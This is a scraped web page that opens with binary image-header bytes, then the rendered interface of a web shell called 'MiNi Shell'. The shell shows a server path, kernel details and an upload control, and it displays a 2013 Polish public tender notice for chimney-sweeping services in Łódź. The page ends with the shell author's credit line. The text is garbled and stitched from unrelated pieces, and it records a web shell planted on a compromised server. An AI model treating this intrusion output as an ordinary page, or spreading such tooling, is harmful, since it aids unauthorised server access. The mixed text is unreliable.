JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/268019-N-2013.html

<p class="kh_header"><b>Łódź: Usługi kominiarskie obowiązkowe (wyciery i przeglądy przewodów kominowych) oraz nieobowiązkowe (dodatkowo zlecane) w nieruchomościach: Gminnych, Skarbu Państwa i współwłasnych z udziałem Gminy powyżej 50% administrowanych przez Zamawiającego.</b><br>
<b>Numer ogłoszenia: 268019 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorna.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi kominiarskie obowiązkowe (wyciery i przeglądy przewodów kominowych) oraz nieobowiązkowe (dodatkowo zlecane) w nieruchomościach: Gminnych, Skarbu Państwa i współwłasnych z udziałem Gminy powyżej 50% administrowanych przez Zamawiającego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi kominiarskie świadczone w ramach tzw. usług kominiarskich 
     obowiązkowych (wyciery i przeglądy przewodów kominowych) - zgodnie z ustawą z dnia 
     07.07.1994 r. Prawo Budowlane (tekst jednolity  z 2010 r. Dz. U. nr 243 poz. 1623 ze zm.) 
     i nieobowiązkowych (dodatkowo zlecanych) w nieruchomościach administrowanych przez 
     Zamawiającego stanowiących własność Gminy, Skarbu Państwa oraz współwłasnych z udziałem 
     Gminy lub Skarbu Państwa powyżej 50% - zgodnie z wykazami nieruchomości stanowiącymi 
     załączniki do SIWZ).
2. Przedmiot zamówienia został podzielony na 4 części:
     Część nr 1
     Usługi kominiarskie świadczone w ramach tzw. usług kominiarskich obowiązkowych (wyciery i 
     przeglądy przewodów kominowych) i nieobowiązkowych (dodatkowo zlecanych) w 
     nieruchomościach stanowiących własność Gminy, Skarbu Państwa oraz współwłasnych z udziałem 
     Gminy lub Skarbu Państwa powyżej 50%  - Rejon Obsługi Nieruchomości (RON) nr 1 
     administrowanych przez Zamawiającego.
     Szczegółowy zakres czynności określony został w cenniku usług (formularzu cenowym) 
     stanowiącym Załącznik nr 2 do SIWZ.
     Wykaz nieruchomości określony został w Załączniku nr 9 do SIWZ, który obejmuje: 
     następujące ilości przewodów kominowych: 
    - przewody dymowe: 1371 szt.
    - przewody spalinowe: 279 szt.
    - przewody wentylacyjne: 3289 szt.

     Część nr 2
     Usługi kominiarskie świadczone w ramach tzw. usług kominiarskich obowiązkowych (wyciery i 
     przeglądy przewodów kominowych) i nieobowiązkowych (dodatkowo zlecanych) w 
     nieruchomościach stanowiących własność Gminy, Skarbu Państwa oraz współwłasnych z udziałem 
     Gminy lub Skarbu Państwa powyżej 50%  - Rejon Obsługi Nieruchomości (RON) nr 2 
     administrowanych przez Zamawiającego.
     Szczegółowy zakres czynności określony został w cenniku usług (formularzu cenowym) 
     stanowiącym Załącznik nr 2 do SIWZ.
     Wykaz nieruchomości określony został w Załączniku nr 10 do SIWZ, który obejmuje: 
     następujące ilości przewodów kominowych: 
    - przewody dymowe: 387 szt.
    - przewody spalinowe: 20 szt.
    - przewody wentylacyjne: 1310 szt.

     Część nr 3
     Usługi kominiarskie świadczone w ramach tzw. usług kominiarskich obowiązkowych (wyciery i 
     przeglądy przewodów kominowych) i nieobowiązkowych (dodatkowo zlecanych) w 
     nieruchomościach stanowiących własność Gminy, Skarbu Państwa oraz współwłasnych z udziałem 
     Gminy lub Skarbu Państwa powyżej 50%  - Rejon Obsługi Nieruchomości (RON) nr 3 
     administrowanych przez Zamawiającego.
     Szczegółowy zakres czynności określony został w cenniku usług (formularzu cenowym) 
     stanowiącym Załącznik nr 2 do SIWZ.
     Wykaz nieruchomości określony został w Załączniku nr 11 do SIWZ, który obejmuje: 
     następujące ilości przewodów kominowych: 
    - przewody dymowe: 1637 szt.
    - przewody spalinowe: 89 szt.
    - przewody wentylacyjne: 1798 szt.

     Część nr 4
     Usługi kominiarskie świadczone w ramach tzw. usług kominiarskich obowiązkowych (wyciery i 
     przeglądy przewodów kominowych) i nieobowiązkowych (dodatkowo zlecanych) w 
     nieruchomościach stanowiących własność Gminy, Skarbu Państwa oraz współwłasnych z udziałem 
     Gminy lub Skarbu Państwa powyżej 50%  - Rejon Obsługi Nieruchomości (RON) nr 4 
     administrowanych przez Zamawiającego.
     Szczegółowy zakres czynności określony został w cenniku usług (formularzu cenowym) 
     stanowiącym Załącznik nr 2 do SIWZ.
     Wykaz nieruchomości określony został w Załączniku nr 12 do SIWZ, który obejmuje: 
     następujące ilości przewodów kominowych: 
    - przewody dymowe: 1799 szt.
    - przewody spalinowe: 90 szt.
    - przewody wentylacyjne: 693 szt.
          Zamawiający dopuszcza składanie ofert częściowych maksymalnie na dwie wybrane części 
          postępowania. Wykonawca może złożyć tylko jedną ofertę na jedną lub maksymalnie dwie 
          części postępowania. Nie zastosowanie się do wskazanego warunku skutkować będzie 
          odrzuceniem oferty.  

3. Zamawiający w przedmiocie zamówienia będzie wymagał od Wykonawcy:
a) opracowania i przedłożenia do akceptacji właściwym koordynatorom RON-ów
    do dnia 31.01.2014 r. harmonogramów dla obowiązkowych usług kominiarskich w 
    zakresie: czyszczeń przewodów kominowych i przeglądów rocznych przewodów kominowych w 
    nieruchomościach w wybranych przez Wykonawcę częściach postępowania;  
b) wykonywania obowiązkowych usług kominiarskich: czyszczeń  przewodów kominowych 
     w nieruchomościach na podstawie zaakceptowanych przez koordynatorów RON- ów 
     harmonogramów opracowanych przez Wykonawcę - zgodnie z wykazami nieruchomości w 
     poszczególnych częściach z częstotliwością:
     -  od palenisk opalanych paliwem stałym (przewody dymowe) - 4 x w roku,
     -  od palenisk opalanych paliwem płynnym i gazowym (przewody spalinowe) - 2 x w roku,
     -  przewody wentylacyjne 1 x w roku.
c) wykonywania obowiązkowych usług kominiarskich: przeglądów rocznych  przewodów 
     kominowych w nieruchomościach na podstawie zaakceptowanych przez koordynatorów RON- ów 
     harmonogramów opracowanych przez Wykonawcę  - zgodnie z wykazami nieruchomości w 
     poszczególnych częściach (budynki bez instalacji gazowej i z instalacją gazową) w zakresie: 
     sporządzania faktycznej dokumentacji to jest: 
     protokołów z kontroli i opinii kominiarskich z przeprowadzonych oględzin ze szczegółowym 
     rysunkiem graficznym usytuowania przewodów kominowych na rzucie dachu budynku z 
     zaznaczeniem rodzaju przewodu i podłączonymi do niego lokalami (z podaniem 
     numerów lokali i kondygnacji, na których są usytuowane te lokale);
d) wykonywania w terminie niezwłocznym usług kominiarskich nieobowiązkowych (dodatkowo 
     zlecanych) czynności określonych w zał. nr 2 do SIWZ na podstawie pisemnych zleceń 
     wystawionych przez służby Zamawiającego. 
  Wszystkie wymienione czynności usług kominiarskich Wykonawca będzie wykonywał przy 
   pomocy własnych pracowników oraz przy użyciu własnych materiałów i własnego sprzętu.

4.  W ramach zamówienia Wykonawca zobowiązany będzie do:
 a) przyjmowania zgłoszeń w przypadkach awaryjnych wymagających natychmiastowej interwencji  
     kominiarskiej po godzinach pracy Zamawiającego oraz w dni wolne od pracy;
 b) wywieszania w budynkach informacji, o terminach czyszczeń przewodów kominowych - zgodnie z 
     ustalonym harmonogramem;
 b) zachowania praw osób trzecich;
 c) ponoszenia pełnej odpowiedzialności za szkody powstałe w wyniku prowadzonych czynności usług 
     kominiarskich.   

5. Zamawiający w ramach zamówienia będzie wymagał od Wykonawcy:
 a) świadczenia usług kominiarskich  zgodnie z obowiązującymi przepisami ustawy 
     z dnia 07.07.1994 r. Prawo Budowlane (tekst jednolity  z 2010 r. Dz. U. nr 243 poz. 1623 ze zm.); 
 b) wykonywania usług kominiarskich przez osoby posiadające kwalifikacje i pod nadzorem osoby 
     posiadającej kwalifikacje min. mistrza w rzemiośle kominiarskim - zgodnie z art. 62 ust.6 pkt. 1 i 2 
     ustawy Prawo Budowlane; 
c) przestrzegania przepisów bezpieczeństwa i higieny pracy - zgodnie z zasadami bezpieczeństwa 
     i higieny pracy określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 06.02.2003 r. 
     w sprawie Bezpieczeństwa i higieny pracy podczas wykonywania robót  budowlanych (Dz. U. 
     Nr 47 poz. 401);
d) sporządzania zestawień rozliczeniowych z otrzymanych zarejestrowanych zleceń za wykonane 
     czynności usługowe na podstawie faktycznie wykonanych czynności (ilości jednostek 
     miary) i  cen jednostkowych (netto) w oparciu o cennik ryczałtowy cen jednostkowych (netto) 
     odrębnie, dla każdej nieruchomości..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4, 71.31.54.00-3, 71.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o których mowa 
     w art. 22 ust. 1 Ustawy, który dotyczy:
a)  posiadania wiedzy i doświadczenia,
    Zamawiający żąda od Wykonawcy dla każdej części postępowania udokumentowania 
    wiedzy i doświadczenia poprzez wykazanie w zał. nr 3 do niniejszej SIWZ wykonanych usług lub 
    usług w trakcie realizacji w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
    jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom 
    stanowiącym przedmiot zamówienia lub podobnym  z podaniem ich wartości, przedmiotu, dat 
    wykonania i odbiorców, w ilości:  minimum jednej usługi w zakresie usług kominiarskich 
    (trwającej minimum 12 miesięcy)  o wartości brutto co najmniej  do wysokości  składanej 
    oferty oraz załączeniem dokumentów - dowodów potwierdzających, że wykazane  przez 
    Wykonawcę usługi zostały wykonane lub są wykonywane należycie.
    Dla usług będących w trakcie realizacji należy załączyć kserokopie podpisanej umowy z 
    informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie    
    może być niższa niż kwota określona powyżej.   
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
    Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o których mowa 
     w art. 22 ust. 1 Ustawy, który dotyczy:
 a) dysponowania potencjałem technicznym; 
     Zamawiający żąda wykazania w zał. nr 4 do niniejszej SIWZ, że Wykonawca dysponuje 
     potencjałem technicznym (sprzętem) gwarantującym terminowe i jakościowo dobre wykonanie 
     usług -  zgodnie z wymogami technologicznymi dla prowadzenia usług kominiarskich,
     minimum: 1 szt. - kamera kominowa,  1 szt. - detektor tlenku węgla, 1 szt. -  analizator 
                         spalin, 1 szt. - anemometr ciągowy).
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa  
     w art. 22 ust. 1 Ustawy, który dotyczy:
  a) dysponowania osobami zdolnymi do wykonania zamówienia;
      Zamawiający żąda od Wykonawcy wykazania w zał. nr 5 do niniejszej SIWZ wykazu osób, które 
      będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych  za 
      kierowanie usługami kominiarskimi. Zamawiający wymaga, aby osoby, które będą uczestniczyć 
      w wykonywaniu zamówienia posiadały stosowne uprawnienia - kwalifikacje w zawodzie 
      kominiarskim (minimum 5 osób):
       - 2 osoby  posiadające uprawnienia mistrza w zawodzie kominiarskim, pozostałe  3 osoby 
         uprawnienia mistrza, czeladnika lub przyuczone w zawodzie kominiarskim wraz  z  załączeniem 
         dokumentów (uprawnień) tych osób.
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
    Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa 
     w art. 22 ust.1 Ustawy, który dotyczy:
 a) sytuacji ekonomicznej i finansowej;
     Zamawiający żąda od Wykonawcy,  posiadania ubezpieczenia od odpowiedzialności 
     cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną
     kwotę na sumę ubezpieczenia minimum na kwotę stanowiącą 100% ceny oferty (brutto).
     W celu potwierdzenia spełnienia wskazanego warunku wykonawca przedstawia polisę wraz z 
     dowodem jej opłacenia lub inny dokument w sposób nie budzący wątpliwości potwierdzający    
     objęcie ochroną ubezpieczeniową. 
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AZK Łódź- Górna, 93-129 Łódź, ul. Lubelska 9/11 pokój 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2013 godzina 10:00, miejsce: AZK Łódź- Górna, 93-129 Łódź, ul. Lubelska 9/11 pokój 6 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com